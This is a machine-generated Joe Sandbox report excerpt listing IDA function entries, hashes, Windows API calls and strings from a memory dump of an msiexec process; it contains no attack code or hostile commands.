                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2754987064-0
                                                                                                          • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                          • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                          • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                          • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 00402FD7
                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                          • strlen.MSVCRT ref: 00403006
                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2754987064-0
                                                                                                          • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                          • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                          • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                          • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcscpy$CloseHandle
                                                                                                          • String ID: General
                                                                                                          • API String ID: 3722638380-26480598
                                                                                                          • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                          • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                          • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                          • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                          APIs
                                                                                                            • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                            • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                            • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                          • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                          • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 764393265-0
                                                                                                          • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                          • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                          • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                          • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                          APIs
                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Time$System$File$LocalSpecific
                                                                                                          • String ID:
                                                                                                          • API String ID: 979780441-0
                                                                                                          • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                          • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                          • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                          • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                          APIs
                                                                                                          • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                          • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                          • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpy$DialogHandleModuleParam
                                                                                                          • String ID:
                                                                                                          • API String ID: 1386444988-0
                                                                                                          • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                          • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                          • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                          • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??3@
                                                                                                          • String ID:
                                                                                                          • API String ID: 613200358-0
                                                                                                          • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                          • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                          • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                          • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                          • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InvalidateMessageRectSend
                                                                                                          • String ID: d=E
                                                                                                          • API String ID: 909852535-3703654223
                                                                                                          • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                          • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                          • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                          • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                          APIs
                                                                                                          • wcschr.MSVCRT ref: 0040F79E
                                                                                                          • wcschr.MSVCRT ref: 0040F7AC
                                                                                                            • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                            • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$memcpywcslen
                                                                                                          • String ID: "
                                                                                                          • API String ID: 1983396471-123907689
                                                                                                          • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                          • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                          • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                          • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                          • _memicmp.MSVCRT ref: 0040C00D
                                                                                                          • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FilePointer_memicmpmemcpy
                                                                                                          • String ID: URL
                                                                                                          • API String ID: 2108176848-3574463123
                                                                                                          • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                          • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                          • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                          • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                          APIs
                                                                                                          • _snwprintf.MSVCRT ref: 0040A398
                                                                                                          • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _snwprintfmemcpy
                                                                                                          • String ID: %2.2X
                                                                                                          • API String ID: 2789212964-323797159
                                                                                                          • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                          • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                          • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                          • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _snwprintf
                                                                                                          • String ID: %%-%d.%ds
                                                                                                          • API String ID: 3988819677-2008345750
                                                                                                          • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                          • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                          • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                          • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 0040E770
                                                                                                          • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSendmemset
                                                                                                          • String ID: F^@
                                                                                                          • API String ID: 568519121-3652327722
                                                                                                          • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                          • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                          • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                          • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PlacementWindowmemset
                                                                                                          • String ID: WinPos
                                                                                                          • API String ID: 4036792311-2823255486
                                                                                                          • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                          • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                          • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                          • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                          APIs
                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                          • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??3@DeleteObject
                                                                                                          • String ID: r!A
                                                                                                          • API String ID: 1103273653-628097481
                                                                                                          • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                          • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                          • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                          • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                          APIs
                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                          • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                          • wcscat.MSVCRT ref: 0040DCFF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileModuleNamewcscatwcsrchr
                                                                                                          • String ID: _lng.ini
                                                                                                          • API String ID: 383090722-1948609170
                                                                                                          • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                          • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                          • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                          • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                          • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                          • API String ID: 2773794195-880857682
                                                                                                          • Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                          • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                          • Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                          • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                          APIs
                                                                                                          • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                          • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                          • memset.MSVCRT ref: 0042BAAE
                                                                                                          • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpy$memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 438689982-0
                                                                                                          • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                          • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                          • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                          • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??2@$memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 1860491036-0
                                                                                                          • Opcode ID: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                                          • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                          • Opcode Fuzzy Hash: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                                          • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                          APIs
                                                                                                          • wcslen.MSVCRT ref: 0040A8E2
                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                          • free.MSVCRT ref: 0040A908
                                                                                                          • free.MSVCRT ref: 0040A92B
                                                                                                          • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: free$memcpy$mallocwcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 726966127-0
                                                                                                          • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                          • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                          • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                          • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                          APIs
                                                                                                          • wcslen.MSVCRT ref: 0040B1DE
                                                                                                          • free.MSVCRT ref: 0040B201
                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                          • free.MSVCRT ref: 0040B224
                                                                                                          • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: free$memcpy$mallocwcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 726966127-0
                                                                                                          • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                          • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                          • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                          • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                          APIs
                                                                                                          • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                                            • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                                            • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                            • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                          • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                                          • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                                          • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcmp$memcpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 231171946-0
                                                                                                          • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                          • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                          • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                          • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                          APIs
                                                                                                          • strlen.MSVCRT ref: 0040B0D8
                                                                                                          • free.MSVCRT ref: 0040B0FB
                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                          • free.MSVCRT ref: 0040B12C
                                                                                                          • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: free$memcpy$mallocstrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3669619086-0
                                                                                                          • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                          • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                          • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                          • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                          APIs
